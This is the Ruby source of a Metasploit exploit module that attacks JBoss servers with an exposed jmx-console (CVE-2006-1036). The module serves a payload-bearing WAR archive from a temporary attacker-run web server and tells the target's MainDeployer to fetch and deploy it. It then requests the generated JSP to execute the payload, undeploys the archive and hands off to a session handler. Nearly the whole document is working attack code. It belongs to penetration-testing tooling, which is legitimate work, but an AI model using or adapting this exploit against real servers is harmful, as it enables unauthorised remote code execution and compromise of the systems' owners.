JBoss JMX Console Deployer Upload and Execute

`##  
# $Id: jboss_maindeployer.rb 8575 2010-02-21 01:44:34Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpServer  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'JBoss JMX Console Deployer Upload and Execute',  
'Description' => %q{  
This module can be used to execute a payload on JBoss servers that have  
an exposed "jmx-console" application. The payload is put on the server by  
using the jboss.system:MainDeployer functionality. To accomplish this, a  
temporary HTTP server is created to serve a WAR archive containing our  
payload. This method will only work if the target server allows outbound  
connections to us.  
},  
'Author' => [ 'jduck' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 8575 $',  
'References' =>  
[  
[ 'CVE', '2006-1036' ],  
[ 'OSVDB', '33744' ],  
[ 'URL', 'http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf' ]  
],  
'Privileged' => true,  
'Platform' => [ 'win' ], # linux untested  
'Stance' => Msf::Exploit::Stance::Aggressive,  
'Targets' =>  
[  
#  
# detect via /manager/serverinfo  
#  
[ 'Automatic', { } ],  
  
#  
# Platform specific targets only  
#  
[ 'Windows Universal',  
{  
'Arch' => ARCH_X86,  
'Platform' => 'win'  
},  
]  
],  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(8080),  
OptString.new('PATH', [ true, "The URI path of the console", '/jmx-console'])  
], self.class)  
end  
  
  
def auto_target  
print_status("Attempting to automatically select a target...")  
  
path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'  
res = send_request_raw(  
{  
'uri' => path  
}, 10)  
  
if (not res) or (res.code != 200)  
print_error("Failed: Error requesting #{path}")  
return nil  
end  
  
arch = nil  
plat = nil  
# TODO: detection requires HTML parsing  
arch = ARCH_X86  
plat = 'win'  
  
# see if we have a match  
targets.each { |t|  
if (t['Platform'] == plat) and (t['Arch'] == arch)  
return t  
end  
}  
  
# no matching target found  
return nil  
end  
  
  
def exploit  
mytarget = target  
if (target.name =~ /Automatic/)  
mytarget = auto_target  
if (not mytarget)  
raise RuntimeError, "Unable to automatically select a target"  
end  
print_status("Automatically selected target \"#{mytarget.name}\"")  
else  
print_status("Using manually select target \"#{mytarget.name}\"")  
end  
  
# set arch/platform from the target  
arch = mytarget['Arch']  
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]  
  
# Generate the WAR containing the EXE containing the payload  
jsp_name = rand_text_alphanumeric(8+rand(8))  
@war_data = Msf::Util::EXE.to_jsp_war(framework,  
arch, plat,  
payload.encoded,  
:jsp_name => jsp_name)  
  
#  
# UPLOAD  
#  
app_base = rand_text_alphanumeric(8+rand(8))  
resource_uri = '/' + app_base + '.war'  
service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'] + resource_uri  
print_status("Starting up our web service on #{service_url} ...")  
start_service({'Uri' => {  
'Proc' => Proc.new { |cli, req|  
on_request_uri(cli, req)  
},  
'Path' => resource_uri  
}})  
print_status("Making the request to the MainDeployer...")  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => datastore['PATH'] + '/HtmlAdaptor',  
'vars_post' =>  
{  
'action' => 'invokeOp',  
'name' => 'jboss.system:service=MainDeployer',  
'methodIndex' => '21', # deploy via java.net.URL  
'arg0' => service_url  
}  
}, 20)  
if (! res)  
raise RuntimeError, "Unable to deploy WAR archive [No Response]"  
end  
if (res.code < 200 or res.code >= 300)  
case res.code  
when 401  
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")  
end  
raise RuntimeError, "Upload to deploy WAR archive [#{res.code} #{res.message}]"  
end  
  
# wait for the data to be sent  
print_status("Waiting for the server to request the WAR archive....")  
waited = 0  
while (not @war_sent)  
select(nil, nil, nil, 1)  
waited += 1  
if (waited > 30)  
raise RuntimeError, 'Server did not request WAR archive -- Maybe it cant connect back to us?'  
end  
end  
  
print_status("Shutting down the web service...")  
stop_service  
  
  
#  
# EXECUTE  
#  
print_status("Executing #{app_base}...")  
res = send_request_cgi({  
'uri' => '/' + app_base + '/' + jsp_name + '.jsp',  
'method' => 'GET'  
}, 20)  
  
if (! res)  
print_error("Execution failed on #{app_base} [No Response]")  
elsif (res.code < 200 or res.code >= 300)  
print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")  
end  
  
  
#  
# DELETE  
#  
print_status("Undeploying #{app_base} ...")  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => datastore['PATH'] + '/HtmlAdaptor',  
'vars_post' =>  
{  
'action' => 'invokeOp',  
'name' => 'jboss.system:service=MainDeployer',  
'methodIndex' => '3', # undeploy via java.String  
'arg0' => app_base  
}  
}, 20)  
if (! res)  
print_error("WARNING: Undeployment failed on #{app_base} [No Response]")  
elsif (res.code < 200 or res.code >= 300)  
print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]")  
end  
  
handler  
end  
  
  
# Handle incoming requests from the server  
def on_request_uri(cli, request)  
  
#print_status("on_request_uri called: #{request.inspect}")  
if (not @war_data)  
print_error("A request came in, but the WAR archive wasn't ready yet!")  
return  
end  
  
print_status("Sending the WAR archive to the server...")  
send_response(cli, @war_data)  
@war_sent = true  
end  
  
end  
`